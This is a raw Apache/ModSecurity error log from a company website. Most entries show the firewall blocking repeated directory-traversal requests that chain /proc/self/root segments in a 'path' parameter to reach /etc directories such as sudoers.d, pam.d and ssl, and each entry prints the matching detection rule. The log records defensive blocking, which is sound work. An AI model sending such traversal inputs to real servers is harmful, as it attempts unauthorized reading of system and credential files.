[Thu Mar 19 13:47:20.191165 2026] [:error] [pid 14269:tid 140411632822016] [client 74.7.241.31:35238] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwomAbLMZ6AikZjR9Vz7wAAAA0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:47:21.295174 2026] [:error] [pid 17887:tid 140411574073088] [client 74.7.243.128:51528] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwomQkwaGbbGflqUZDfVgAAANQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:47:25.083556 2026] [:error] [pid 17887:tid 140411666392832] [client 74.7.243.128:51538] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwonQkwaGbbGflqUZDfWQAAAMk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:47:26.699993 2026] [:error] [pid 27403:tid 140411548894976] [client 74.7.241.31:35248] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwonhkFeYa1D6dYQnAIAQAAAdc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:47:28.133782 2026] [proxy_fcgi:error] [pid 19093:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:33470] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:47:28.899528 2026] [:error] [pid 26799:tid 140411716749056] [client 74.7.243.128:51542] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwooNa6ubjKNq_cu4ZtdwAAA0M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:47:30.494142 2026] [:error] [pid 27293:tid 140411641214720] [client 74.7.241.31:48436] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwoof-YZRR_7pZ7nDKh7QAAA8w"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:47:30.719528 2026] [:error] [pid 15826:tid 140411658000128] [client 74.7.243.128:41810] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwoouoXxyEfFpUF8f8jNQAAAUo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:47:33.877268 2026] [:error] [pid 17887:tid 140411658000128] [client 74.7.243.128:41820] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwopQkwaGbbGflqUZDfZAAAAMo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:47:35.143444 2026] [:error] [pid 26799:tid 140411741927168] [client 74.7.241.31:48438] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwop9a6ubjKNq_cu4ZtfgAAA0A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:47:36.103223 2026] [:error] [pid 17887:tid 140411733534464] [client 74.7.244.43:57640] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abwoqAkwaGbbGflqUZDfaQAAAME"]
[Thu Mar 19 13:47:38.701014 2026] [:error] [pid 31803:tid 140411708356352] [client 74.7.243.128:41832] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwoquyqAr6etmhZHNp2RgAAAEQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:47:41.515913 2026] [:error] [pid 17887:tid 140411658000128] [client 74.7.241.31:42724] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abworQkwaGbbGflqUZDfcAAAAMo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:47:41.983617 2026] [:error] [pid 15826:tid 140411548894976] [client 74.7.243.128:33574] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abworeoXxyEfFpUF8f8jPQAAAVc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:47:51.181812 2026] [proxy_fcgi:error] [pid 15826:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:34136] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:47:57.700691 2026] [mime_magic:error] [pid 27293:tid 140411540502272] (70014)End of file found: [client 57.141.18.82:39410] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 13:47:59.279079 2026] [:error] [pid 17887:tid 140411616036608] [client 74.7.243.128:33576] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwovwkwaGbbGflqUZDfgQAAAM8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:48:05.371548 2026] [:error] [pid 17653:tid 140411557287680] [client 74.7.241.31:42732] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwoxcdf6f5d65gmYZSQNgAAAtY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:48:10.984727 2026] [:error] [pid 19093:tid 140411548894976] [client 74.7.241.31:39296] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwoyl_V7PWP6ixUYl7TjAAAApc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:48:16.137819 2026] [proxy_fcgi:error] [pid 27403:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:34972] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:48:19.572184 2026] [:error] [pid 27403:tid 140411565680384] [client 74.7.243.128:46852] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwo0xkFeYa1D6dYQnAILAAAAdU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:48:21.087681 2026] [:error] [pid 17887:tid 140411565680384] [client 74.7.241.31:39302] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwo1QkwaGbbGflqUZDfjwAAANU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:48:23.547103 2026] [:error] [pid 14269:tid 140411716749056] [client 74.7.243.128:48832] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwo1wbLMZ6AikZjR9V0IQAAAAM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:48:28.903741 2026] [:error] [pid 27293:tid 140411691570944] [client 74.7.243.128:48836] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwo3P-YZRR_7pZ7nDKiFwAAA8Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:48:34.995060 2026] [:error] [pid 15826:tid 140411649607424] [client 74.7.243.128:58184] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwo4uoXxyEfFpUF8f8jYgAAAUs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:48:46.126015 2026] [proxy_fcgi:error] [pid 27293:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:35968] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:49:07.153862 2026] [core:alert] [pid 27403:tid 140411565680384] [client 57.141.18.46:42352] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 13:49:07.395822 2026] [core:alert] [pid 26799:tid 140411582465792] [client 57.141.18.88:42364] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
